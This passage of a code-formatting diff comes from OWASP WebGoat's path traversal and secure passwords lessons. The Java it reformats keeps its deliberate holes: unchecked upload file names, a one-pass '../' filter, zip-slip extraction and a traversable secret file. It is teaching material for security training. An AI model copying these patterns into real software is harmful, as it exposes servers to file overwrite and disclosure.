@@ -29,13 +29,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class PathTraversal extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A3;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A3;
+  }
 
-    @Override
-    public String getTitle() {
-        return "path-traversal-title";
-    }
+  @Override
+  public String getTitle() {
+    return "path-traversal-title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUpload.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUpload.java
index 754933530..6c76cede7 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUpload.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUpload.java
@@ -1,5 +1,8 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
+import static org.springframework.http.MediaType.ALL_VALUE;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
+
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.container.session.WebSession;
@@ -12,27 +15,33 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.multipart.MultipartFile;
 
-import static org.springframework.http.MediaType.ALL_VALUE;
-import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
-
 @RestController
-@AssignmentHints({"path-traversal-profile.hint1", "path-traversal-profile.hint2", "path-traversal-profile.hint3"})
+@AssignmentHints({
+  "path-traversal-profile.hint1",
+  "path-traversal-profile.hint2",
+  "path-traversal-profile.hint3"
+})
 public class ProfileUpload extends ProfileUploadBase {
 
-    public ProfileUpload(@Value("${webgoat.server.directory}") String webGoatHomeDirectory, WebSession webSession) {
-        super(webGoatHomeDirectory, webSession);
-    }
+  public ProfileUpload(
+      @Value("${webgoat.server.directory}") String webGoatHomeDirectory, WebSession webSession) {
+    super(webGoatHomeDirectory, webSession);
+  }
 
-    @PostMapping(value = "/PathTraversal/profile-upload", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public AttackResult uploadFileHandler(@RequestParam("uploadedFile") MultipartFile file, @RequestParam(value = "fullName", required = false) String fullName) {
-        return super.execute(file, fullName);
-    }
-
-    @GetMapping("/PathTraversal/profile-picture")
-    @ResponseBody
-    public ResponseEntity<?> getProfilePicture() {
-        return super.getProfilePicture();
-    }
+  @PostMapping(
+      value = "/PathTraversal/profile-upload",
+      consumes = ALL_VALUE,
+      produces = APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public AttackResult uploadFileHandler(
+      @RequestParam("uploadedFile") MultipartFile file,
+      @RequestParam(value = "fullName", required = false) String fullName) {
+    return super.execute(file, fullName);
+  }
 
+  @GetMapping("/PathTraversal/profile-picture")
+  @ResponseBody
+  public ResponseEntity<?> getProfilePicture() {
+    return super.getProfilePicture();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
index 4377650a1..a1ca0967e 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadBase.java
@@ -1,5 +1,9 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.util.Base64;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.SneakyThrows;
@@ -13,82 +17,89 @@ import org.springframework.util.FileSystemUtils;
 import org.springframework.util.StringUtils;
 import org.springframework.web.multipart.MultipartFile;
 
-import java.io.File;
-import java.io.FileInputStream;
-import java.io.IOException;
-import java.util.Base64;
-
 @AllArgsConstructor
 @Getter
 public class ProfileUploadBase extends AssignmentEndpoint {
 
-    private String webGoatHomeDirectory;
-    private WebSession webSession;
+  private String webGoatHomeDirectory;
+  private WebSession webSession;
 
-    protected AttackResult execute(MultipartFile file, String fullName) {
-        if (file.isEmpty()) {
-            return failed(this).feedback("path-traversal-profile-empty-file").build();
-        }
-        if (StringUtils.isEmpty(fullName)) {
-            return failed(this).feedback("path-traversal-profile-empty-name").build();
-        }
-
-        var uploadDirectory = new File(this.webGoatHomeDirectory, "/PathTraversal/" + webSession.getUserName());
-        if (uploadDirectory.exists()) {
-            FileSystemUtils.deleteRecursively(uploadDirectory);
-        }
-
-        try {
-            uploadDirectory.mkdirs();
-            var uploadedFile = new File(uploadDirectory, fullName);
-            uploadedFile.createNewFile();
-            FileCopyUtils.copy(file.getBytes(), uploadedFile);
-
-            if (attemptWasMade(uploadDirectory, uploadedFile)) {
-                return solvedIt(uploadedFile);
-            }
-            return informationMessage(this).feedback("path-traversal-profile-updated").feedbackArgs(uploadedFile.getAbsoluteFile()).build();
-
-        } catch (IOException e) {
-            return failed(this).output(e.getMessage()).build();
-        }
+  protected AttackResult execute(MultipartFile file, String fullName) {
+    if (file.isEmpty()) {
+      return failed(this).feedback("path-traversal-profile-empty-file").build();
+    }
+    if (StringUtils.isEmpty(fullName)) {
+      return failed(this).feedback("path-traversal-profile-empty-name").build();
     }
 
-    private boolean attemptWasMade(File expectedUploadDirectory, File uploadedFile) throws IOException {
-        return !expectedUploadDirectory.getCanonicalPath().equals(uploadedFile.getParentFile().getCanonicalPath());
+    var uploadDirectory =
+        new File(this.webGoatHomeDirectory, "/PathTraversal/" + webSession.getUserName());
+    if (uploadDirectory.exists()) {
+      FileSystemUtils.deleteRecursively(uploadDirectory);
     }
 
-    private AttackResult solvedIt(File uploadedFile) throws IOException {
-        if (uploadedFile.getCanonicalFile().getParentFile().getName().endsWith("PathTraversal")) {
-            return success(this).build();
-        }
-        return failed(this).attemptWasMade().feedback("path-traversal-profile-attempt").feedbackArgs(uploadedFile.getCanonicalPath()).build();
+    try {
+      uploadDirectory.mkdirs();
+      var uploadedFile = new File(uploadDirectory, fullName);
+      uploadedFile.createNewFile();
+      FileCopyUtils.copy(file.getBytes(), uploadedFile);
+
+      if (attemptWasMade(uploadDirectory, uploadedFile)) {
+        return solvedIt(uploadedFile);
+      }
+      return informationMessage(this)
+          .feedback("path-traversal-profile-updated")
+          .feedbackArgs(uploadedFile.getAbsoluteFile())
+          .build();
+
+    } catch (IOException e) {
+      return failed(this).output(e.getMessage()).build();
     }
+  }
 
-    public ResponseEntity<?> getProfilePicture() {
-        return ResponseEntity.ok()
-                .contentType(MediaType.parseMediaType(MediaType.IMAGE_JPEG_VALUE))
-                .body(getProfilePictureAsBase64());
+  private boolean attemptWasMade(File expectedUploadDirectory, File uploadedFile)
+      throws IOException {
+    return !expectedUploadDirectory
+        .getCanonicalPath()
+        .equals(uploadedFile.getParentFile().getCanonicalPath());
+  }
+
+  private AttackResult solvedIt(File uploadedFile) throws IOException {
+    if (uploadedFile.getCanonicalFile().getParentFile().getName().endsWith("PathTraversal")) {
+      return success(this).build();
     }
+    return failed(this)
+        .attemptWasMade()
+        .feedback("path-traversal-profile-attempt")
+        .feedbackArgs(uploadedFile.getCanonicalPath())
+        .build();
+  }
 
-    protected byte[] getProfilePictureAsBase64() {
-        var profilePictureDirectory = new File(this.webGoatHomeDirectory, "/PathTraversal/" + webSession.getUserName());
-        var profileDirectoryFiles = profilePictureDirectory.listFiles();
+  public ResponseEntity<?> getProfilePicture() {
+    return ResponseEntity.ok()
+        .contentType(MediaType.parseMediaType(MediaType.IMAGE_JPEG_VALUE))
+        .body(getProfilePictureAsBase64());
+  }
 
-        if (profileDirectoryFiles != null && profileDirectoryFiles.length > 0) {
-            try (var inputStream = new FileInputStream(profileDirectoryFiles[0])) {
-                return Base64.getEncoder().encode(FileCopyUtils.copyToByteArray(inputStream));
-            } catch (IOException e) {
-                return defaultImage();
-            }
-        } else {
-            return defaultImage();
-        }
-    }
+  protected byte[] getProfilePictureAsBase64() {
+    var profilePictureDirectory =
+        new File(this.webGoatHomeDirectory, "/PathTraversal/" + webSession.getUserName());
+    var profileDirectoryFiles = profilePictureDirectory.listFiles();
 
-    @SneakyThrows
-    private byte[] defaultImage() {
-        var inputStream = getClass().getResourceAsStream("/images/account.png");
+    if (profileDirectoryFiles != null && profileDirectoryFiles.length > 0) {
+      try (var inputStream = new FileInputStream(profileDirectoryFiles[0])) {
         return Base64.getEncoder().encode(FileCopyUtils.copyToByteArray(inputStream));
+      } catch (IOException e) {
+        return defaultImage();
+      }
+    } else {
+      return defaultImage();
     }
+  }
+
+  @SneakyThrows
+  private byte[] defaultImage() {
+    var inputStream = getClass().getResourceAsStream("/images/account.png");
+    return Base64.getEncoder().encode(FileCopyUtils.copyToByteArray(inputStream));
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFix.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFix.java
index c1dd5ce58..90c0589b9 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFix.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadFix.java
@@ -1,5 +1,8 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
+import static org.springframework.http.MediaType.ALL_VALUE;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
+
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.container.session.WebSession;
@@ -12,28 +15,33 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.multipart.MultipartFile;
 
-import static org.springframework.http.MediaType.ALL_VALUE;
-import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
-
 @RestController
-@AssignmentHints({"path-traversal-profile-fix.hint1", "path-traversal-profile-fix.hint2", "path-traversal-profile-fix.hint3"})
+@AssignmentHints({
+  "path-traversal-profile-fix.hint1",
+  "path-traversal-profile-fix.hint2",
+  "path-traversal-profile-fix.hint3"
+})
 public class ProfileUploadFix extends ProfileUploadBase {
 
-    public ProfileUploadFix(@Value("${webgoat.server.directory}") String webGoatHomeDirectory, WebSession webSession) {
-        super(webGoatHomeDirectory, webSession);
-    }
+  public ProfileUploadFix(
+      @Value("${webgoat.server.directory}") String webGoatHomeDirectory, WebSession webSession) {
+    super(webGoatHomeDirectory, webSession);
+  }
 
-    @PostMapping(value = "/PathTraversal/profile-upload-fix", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public AttackResult uploadFileHandler(
-            @RequestParam("uploadedFileFix") MultipartFile file,
-            @RequestParam(value = "fullNameFix", required = false) String fullName) {
-        return super.execute(file, fullName != null ? fullName.replace("../", "") : "");
-    }
+  @PostMapping(
+      value = "/PathTraversal/profile-upload-fix",
+      consumes = ALL_VALUE,
+      produces = APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public AttackResult uploadFileHandler(
+      @RequestParam("uploadedFileFix") MultipartFile file,
+      @RequestParam(value = "fullNameFix", required = false) String fullName) {
+    return super.execute(file, fullName != null ? fullName.replace("../", "") : "");
+  }
 
-    @GetMapping("/PathTraversal/profile-picture-fix")
-    @ResponseBody
-    public ResponseEntity<?> getProfilePicture() {
-        return super.getProfilePicture();
-    }
+  @GetMapping("/PathTraversal/profile-picture-fix")
+  @ResponseBody
+  public ResponseEntity<?> getProfilePicture() {
+    return super.getProfilePicture();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInput.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInput.java
index d62c8451d..95971df26 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInput.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRemoveUserInput.java
@@ -1,5 +1,8 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
+import static org.springframework.http.MediaType.ALL_VALUE;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
+
 import org.owasp.webgoat.container.assignments.AssignmentHints;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.owasp.webgoat.container.session.WebSession;
@@ -10,20 +13,26 @@ import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.multipart.MultipartFile;
 
-import static org.springframework.http.MediaType.ALL_VALUE;
-import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
-
 @RestController
-@AssignmentHints({"path-traversal-profile-remove-user-input.hint1", "path-traversal-profile-remove-user-input.hint2", "path-traversal-profile-remove-user-input.hint3"})
+@AssignmentHints({
+  "path-traversal-profile-remove-user-input.hint1",
+  "path-traversal-profile-remove-user-input.hint2",
+  "path-traversal-profile-remove-user-input.hint3"
+})
 public class ProfileUploadRemoveUserInput extends ProfileUploadBase {
 
-    public ProfileUploadRemoveUserInput(@Value("${webgoat.server.directory}") String webGoatHomeDirectory, WebSession webSession) {
-        super(webGoatHomeDirectory, webSession);
-    }
+  public ProfileUploadRemoveUserInput(
+      @Value("${webgoat.server.directory}") String webGoatHomeDirectory, WebSession webSession) {
+    super(webGoatHomeDirectory, webSession);
+  }
 
-    @PostMapping(value = "/PathTraversal/profile-upload-remove-user-input", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public AttackResult uploadFileHandler(@RequestParam("uploadedFileRemoveUserInput") MultipartFile file) {
-        return super.execute(file, file.getOriginalFilename());
-    }
+  @PostMapping(
+      value = "/PathTraversal/profile-upload-remove-user-input",
+      consumes = ALL_VALUE,
+      produces = APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public AttackResult uploadFileHandler(
+      @RequestParam("uploadedFileRemoveUserInput") MultipartFile file) {
+    return super.execute(file, file.getOriginalFilename());
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrieval.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrieval.java
index b010532eb..f52bed34a 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrieval.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileUploadRetrieval.java
@@ -1,5 +1,15 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.net.URI;
+import java.net.URISyntaxException;
+import java.nio.file.Files;
+import java.util.Base64;
+import javax.annotation.PostConstruct;
+import javax.servlet.http.HttpServletRequest;
 import lombok.extern.slf4j.Slf4j;
 import org.apache.commons.lang3.RandomUtils;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
@@ -19,90 +29,88 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import javax.annotation.PostConstruct;
-import javax.servlet.http.HttpServletRequest;
-import java.io.File;
-import java.io.FileOutputStream;
-import java.io.IOException;
-import java.io.InputStream;
-import java.net.URI;
-import java.net.URISyntaxException;
-import java.nio.file.Files;
-import java.util.Base64;
-
 @RestController
 @AssignmentHints({
-        "path-traversal-profile-retrieve.hint1",
-        "path-traversal-profile-retrieve.hint2",
-        "path-traversal-profile-retrieve.hint3",
-        "path-traversal-profile-retrieve.hint4",
-        "path-traversal-profile-retrieve.hint5",
-        "path-traversal-profile-retrieve.hint6"})
+  "path-traversal-profile-retrieve.hint1",
+  "path-traversal-profile-retrieve.hint2",
+  "path-traversal-profile-retrieve.hint3",
+  "path-traversal-profile-retrieve.hint4",
+  "path-traversal-profile-retrieve.hint5",
+  "path-traversal-profile-retrieve.hint6"
+})
 @Slf4j
 public class ProfileUploadRetrieval extends AssignmentEndpoint {
 
-    private final File catPicturesDirectory;
+  private final File catPicturesDirectory;
 
-    public ProfileUploadRetrieval(@Value("${webgoat.server.directory}") String webGoatHomeDirectory) {
-        this.catPicturesDirectory = new File(webGoatHomeDirectory, "/PathTraversal/" + "/cats");
-        this.catPicturesDirectory.mkdirs();
+  public ProfileUploadRetrieval(@Value("${webgoat.server.directory}") String webGoatHomeDirectory) {
+    this.catPicturesDirectory = new File(webGoatHomeDirectory, "/PathTraversal/" + "/cats");
+    this.catPicturesDirectory.mkdirs();
+  }
+
+  @PostConstruct
+  public void initAssignment() {
+    for (int i = 1; i <= 10; i++) {
+      try (InputStream is =
+          new ClassPathResource("lessons/pathtraversal/images/cats/" + i + ".jpg")
+              .getInputStream()) {
+        FileCopyUtils.copy(is, new FileOutputStream(new File(catPicturesDirectory, i + ".jpg")));
+      } catch (Exception e) {
+        log.error("Unable to copy pictures" + e.getMessage());
+      }
+    }
+    var secretDirectory = this.catPicturesDirectory.getParentFile().getParentFile();
+    try {
+      Files.writeString(
+          secretDirectory.toPath().resolve("path-traversal-secret.jpg"),
+          "You found it submit the SHA-512 hash of your username as answer");
+    } catch (IOException e) {
+      log.error("Unable to write secret in: {}", secretDirectory, e);
+    }
+  }
+
+  @PostMapping("/PathTraversal/random")
+  @ResponseBody
+  public AttackResult execute(@RequestParam(value = "secret", required = false) String secret) {
+    if (Sha512DigestUtils.shaHex(getWebSession().getUserName()).equalsIgnoreCase(secret)) {
+      return success(this).build();
+    }
+    return failed(this).build();
+  }
+
+  @GetMapping("/PathTraversal/random-picture")
+  @ResponseBody
+  public ResponseEntity<?> getProfilePicture(HttpServletRequest request) {
+    var queryParams = request.getQueryString();
+    if (queryParams != null && (queryParams.contains("..") || queryParams.contains("/"))) {
+      return ResponseEntity.badRequest()
+          .body("Illegal characters are not allowed in the query params");
+    }
+    try {
+      var id = request.getParameter("id");
+      var catPicture =
+          new File(catPicturesDirectory, (id == null ? RandomUtils.nextInt(1, 11) : id) + ".jpg");
+
+      if (catPicture.getName().toLowerCase().contains("path-traversal-secret.jpg")) {
+        return ResponseEntity.ok()
+            .contentType(MediaType.parseMediaType(MediaType.IMAGE_JPEG_VALUE))
+            .body(FileCopyUtils.copyToByteArray(catPicture));
+      }
+      if (catPicture.exists()) {
+        return ResponseEntity.ok()
+            .contentType(MediaType.parseMediaType(MediaType.IMAGE_JPEG_VALUE))
+            .location(new URI("/PathTraversal/random-picture?id=" + catPicture.getName()))
+            .body(Base64.getEncoder().encode(FileCopyUtils.copyToByteArray(catPicture)));
+      }
+      return ResponseEntity.status(HttpStatus.NOT_FOUND)
+          .location(new URI("/PathTraversal/random-picture?id=" + catPicture.getName()))
+          .body(
+              StringUtils.arrayToCommaDelimitedString(catPicture.getParentFile().listFiles())
+                  .getBytes());
+    } catch (IOException | URISyntaxException e) {
+      log.error("Image not found", e);
     }
 
-    @PostConstruct
-    public void initAssignment() {
-        for (int i = 1; i <= 10; i++) {
-            try (InputStream is = new ClassPathResource("lessons/pathtraversal/images/cats/" + i + ".jpg").getInputStream()) {
-                FileCopyUtils.copy(is, new FileOutputStream(new File(catPicturesDirectory, i + ".jpg")));
-            } catch (Exception e) {
-                log.error("Unable to copy pictures" + e.getMessage());
-            }
-        }
-        var secretDirectory = this.catPicturesDirectory.getParentFile().getParentFile();
-        try {
-            Files.writeString(secretDirectory.toPath().resolve("path-traversal-secret.jpg"), "You found it submit the SHA-512 hash of your username as answer");
-        } catch (IOException e) {
-            log.error("Unable to write secret in: {}", secretDirectory, e);
-        }
-    }
-
-    @PostMapping("/PathTraversal/random")
-    @ResponseBody
-    public AttackResult execute(@RequestParam(value = "secret", required = false) String secret) {
-        if (Sha512DigestUtils.shaHex(getWebSession().getUserName()).equalsIgnoreCase(secret)) {
-            return success(this).build();
-        }
-        return failed(this).build();
-    }
-
-    @GetMapping("/PathTraversal/random-picture")
-    @ResponseBody
-    public ResponseEntity<?> getProfilePicture(HttpServletRequest request) {
-        var queryParams = request.getQueryString();
-        if (queryParams != null && (queryParams.contains("..") || queryParams.contains("/"))) {
-            return ResponseEntity.badRequest().body("Illegal characters are not allowed in the query params");
-        }
-        try {
-            var id = request.getParameter("id");
-            var catPicture = new File(catPicturesDirectory, (id == null ? RandomUtils.nextInt(1, 11) : id) + ".jpg");
-
-            if (catPicture.getName().toLowerCase().contains("path-traversal-secret.jpg")) {
-                return ResponseEntity.ok()
-                        .contentType(MediaType.parseMediaType(MediaType.IMAGE_JPEG_VALUE))
-                        .body(FileCopyUtils.copyToByteArray(catPicture));
-            }
-            if (catPicture.exists()) {
-                return ResponseEntity.ok()
-                        .contentType(MediaType.parseMediaType(MediaType.IMAGE_JPEG_VALUE))
-                        .location(new URI("/PathTraversal/random-picture?id=" + catPicture.getName()))
-                        .body(Base64.getEncoder().encode(FileCopyUtils.copyToByteArray(catPicture)));
-            }
-            return ResponseEntity.status(HttpStatus.NOT_FOUND)
-                    .location(new URI("/PathTraversal/random-picture?id=" + catPicture.getName()))
-                    .body(StringUtils.arrayToCommaDelimitedString(catPicture.getParentFile().listFiles()).getBytes());
-        } catch (IOException | URISyntaxException e) {
-            log.error("Image not found", e);
-        }
-
-        return ResponseEntity.badRequest().build();
-    }
+    return ResponseEntity.badRequest().build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
index 7bcf317d9..c14223560 100644
--- a/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
+++ b/src/main/java/org/owasp/webgoat/lessons/pathtraversal/ProfileZipSlip.java
@@ -1,14 +1,7 @@
 package org.owasp.webgoat.lessons.pathtraversal;
 
-import lombok.SneakyThrows;
-import org.owasp.webgoat.container.assignments.AssignmentHints;
-import org.owasp.webgoat.container.assignments.AttackResult;
-import org.owasp.webgoat.container.session.WebSession;
-import org.springframework.beans.factory.annotation.Value;
-import org.springframework.http.ResponseEntity;
-import org.springframework.util.FileCopyUtils;
-import org.springframework.web.bind.annotation.*;
-import org.springframework.web.multipart.MultipartFile;
+import static org.springframework.http.MediaType.ALL_VALUE;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
 
 import java.io.File;
 import java.io.IOException;
@@ -19,72 +12,87 @@ import java.util.Arrays;
 import java.util.Enumeration;
 import java.util.zip.ZipEntry;
 import java.util.zip.ZipFile;
-
-import static org.springframework.http.MediaType.ALL_VALUE;
-import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
+import lombok.SneakyThrows;
+import org.owasp.webgoat.container.assignments.AssignmentHints;
+import org.owasp.webgoat.container.assignments.AttackResult;
+import org.owasp.webgoat.container.session.WebSession;
+import org.springframework.beans.factory.annotation.Value;
+import org.springframework.http.ResponseEntity;
+import org.springframework.util.FileCopyUtils;
+import org.springframework.web.bind.annotation.*;
+import org.springframework.web.multipart.MultipartFile;
 
 @RestController
-@AssignmentHints({"path-traversal-zip-slip.hint1", "path-traversal-zip-slip.hint2", "path-traversal-zip-slip.hint3", "path-traversal-zip-slip.hint4"})
+@AssignmentHints({
+  "path-traversal-zip-slip.hint1",
+  "path-traversal-zip-slip.hint2",
+  "path-traversal-zip-slip.hint3",
+  "path-traversal-zip-slip.hint4"
+})
 public class ProfileZipSlip extends ProfileUploadBase {
 
-    public ProfileZipSlip(@Value("${webgoat.server.directory}") String webGoatHomeDirectory, WebSession webSession) {
-        super(webGoatHomeDirectory, webSession);
+  public ProfileZipSlip(
+      @Value("${webgoat.server.directory}") String webGoatHomeDirectory, WebSession webSession) {
+    super(webGoatHomeDirectory, webSession);
+  }
+
+  @PostMapping(
+      value = "/PathTraversal/zip-slip",
+      consumes = ALL_VALUE,
+      produces = APPLICATION_JSON_VALUE)
+  @ResponseBody
+  public AttackResult uploadFileHandler(@RequestParam("uploadedFileZipSlip") MultipartFile file) {
+    if (!file.getOriginalFilename().toLowerCase().endsWith(".zip")) {
+      return failed(this).feedback("path-traversal-zip-slip.no-zip").build();
+    } else {
+      return processZipUpload(file);
     }
+  }
 
-    @PostMapping(value = "/PathTraversal/zip-slip", consumes = ALL_VALUE, produces = APPLICATION_JSON_VALUE)
-    @ResponseBody
-    public AttackResult uploadFileHandler(@RequestParam("uploadedFileZipSlip") MultipartFile file) {
-        if (!file.getOriginalFilename().toLowerCase().endsWith(".zip")) {
-            return failed(this).feedback("path-traversal-zip-slip.no-zip").build();
-        } else {
-            return processZipUpload(file);
-        }
+  @SneakyThrows
+  private AttackResult processZipUpload(MultipartFile file) {
+    var tmpZipDirectory = Files.createTempDirectory(getWebSession().getUserName());
+    var uploadDirectory =
+        new File(getWebGoatHomeDirectory(), "/PathTraversal/" + getWebSession().getUserName());
+    var currentImage = getProfilePictureAsBase64();
+
+    Files.createDirectories(uploadDirectory.toPath());
+
+    try {
+      var uploadedZipFile = tmpZipDirectory.resolve(file.getOriginalFilename());
+      FileCopyUtils.copy(file.getBytes(), uploadedZipFile.toFile());
+
+      ZipFile zip = new ZipFile(uploadedZipFile.toFile());
+      Enumeration<? extends ZipEntry> entries = zip.entries();
+      while (entries.hasMoreElements()) {
+        ZipEntry e = entries.nextElement();
+        File f = new File(tmpZipDirectory.toFile(), e.getName());
+        InputStream is = zip.getInputStream(e);
+        Files.copy(is, f.toPath(), StandardCopyOption.REPLACE_EXISTING);
+      }
+
+      return isSolved(currentImage, getProfilePictureAsBase64());
+    } catch (IOException e) {
+      return failed(this).output(e.getMessage()).build();
     }
+  }
 
-    @SneakyThrows
-    private AttackResult processZipUpload(MultipartFile file) {
-        var tmpZipDirectory = Files.createTempDirectory(getWebSession().getUserName());
-        var uploadDirectory = new File(getWebGoatHomeDirectory(), "/PathTraversal/" + getWebSession().getUserName());
-        var currentImage = getProfilePictureAsBase64();
-
-        Files.createDirectories(uploadDirectory.toPath());
-
-        try {
-            var uploadedZipFile = tmpZipDirectory.resolve(file.getOriginalFilename());
-            FileCopyUtils.copy(file.getBytes(), uploadedZipFile.toFile());
-
-            ZipFile zip = new ZipFile(uploadedZipFile.toFile());
-            Enumeration<? extends ZipEntry> entries = zip.entries();
-            while (entries.hasMoreElements()) {
-                ZipEntry e = entries.nextElement();
-                File f = new File(tmpZipDirectory.toFile(), e.getName());
-                InputStream is = zip.getInputStream(e);
-                Files.copy(is, f.toPath(), StandardCopyOption.REPLACE_EXISTING);
-            }
-
-            return isSolved(currentImage, getProfilePictureAsBase64());
-        } catch (IOException e) {
-            return failed(this).output(e.getMessage()).build();
-        }
+  private AttackResult isSolved(byte[] currentImage, byte[] newImage) {
+    if (Arrays.equals(currentImage, newImage)) {
+      return failed(this).output("path-traversal-zip-slip.extracted").build();
     }
+    return success(this).output("path-traversal-zip-slip.extracted").build();
+  }
 
-    private AttackResult isSolved(byte[] currentImage, byte[] newImage) {
-        if (Arrays.equals(currentImage, newImage)) {
-            return failed(this).output("path-traversal-zip-slip.extracted").build();
-        }
-        return success(this).output("path-traversal-zip-slip.extracted").build();
-    }
-
-    @GetMapping("/PathTraversal/zip-slip/")
-    @ResponseBody
-    public ResponseEntity<?> getProfilePicture() {
-        return super.getProfilePicture();
-    }
-
-    @GetMapping("/PathTraversal/zip-slip/profile-image/{username}")
-    @ResponseBody
-    public ResponseEntity<?> getProfilePicture(@PathVariable("username") String username) {
-        return ResponseEntity.notFound().build();
-    }
+  @GetMapping("/PathTraversal/zip-slip/")
+  @ResponseBody
+  public ResponseEntity<?> getProfilePicture() {
+    return super.getProfilePicture();
+  }
 
+  @GetMapping("/PathTraversal/zip-slip/profile-image/{username}")
+  @ResponseBody
+  public ResponseEntity<?> getProfilePicture(@PathVariable("username") String username) {
+    return ResponseEntity.notFound().build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswords.java b/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswords.java
index 0456c0717..99a62aeff 100644
--- a/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswords.java
+++ b/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswords.java
@@ -33,13 +33,13 @@ import org.springframework.stereotype.Component;
 @Component
 public class SecurePasswords extends Lesson {
 
-    @Override
-    public Category getDefaultCategory() {
-        return Category.A7;
-    }
+  @Override
+  public Category getDefaultCategory() {
+    return Category.A7;
+  }
 
-    @Override
-    public String getTitle() {
-        return "secure-passwords.title";
-    }
+  @Override
+  public String getTitle() {
+    return "secure-passwords.title";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswordsAssignment.java b/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswordsAssignment.java
index b026722e3..5b9932d36 100644
--- a/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswordsAssignment.java
+++ b/src/main/java/org/owasp/webgoat/lessons/securepasswords/SecurePasswordsAssignment.java
@@ -24,6 +24,9 @@ package org.owasp.webgoat.lessons.securepasswords;
 
 import com.nulabinc.zxcvbn.Strength;
 import com.nulabinc.zxcvbn.Zxcvbn;
+import java.text.DecimalFormat;
+import java.text.DecimalFormatSymbols;
+import java.util.Locale;
 import org.owasp.webgoat.container.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.container.assignments.AttackResult;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -31,64 +34,85 @@ import org.springframework.web.bind.annotation.RequestParam;
 import org.springframework.web.bind.annotation.ResponseBody;
 import org.springframework.web.bind.annotation.RestController;
 
-import java.text.DecimalFormat;
-import java.text.DecimalFormatSymbols;
-import java.util.Locale;
-
 @RestController
 public class SecurePasswordsAssignment extends AssignmentEndpoint {
 
-    @PostMapping("SecurePasswords/assignment")
-    @ResponseBody
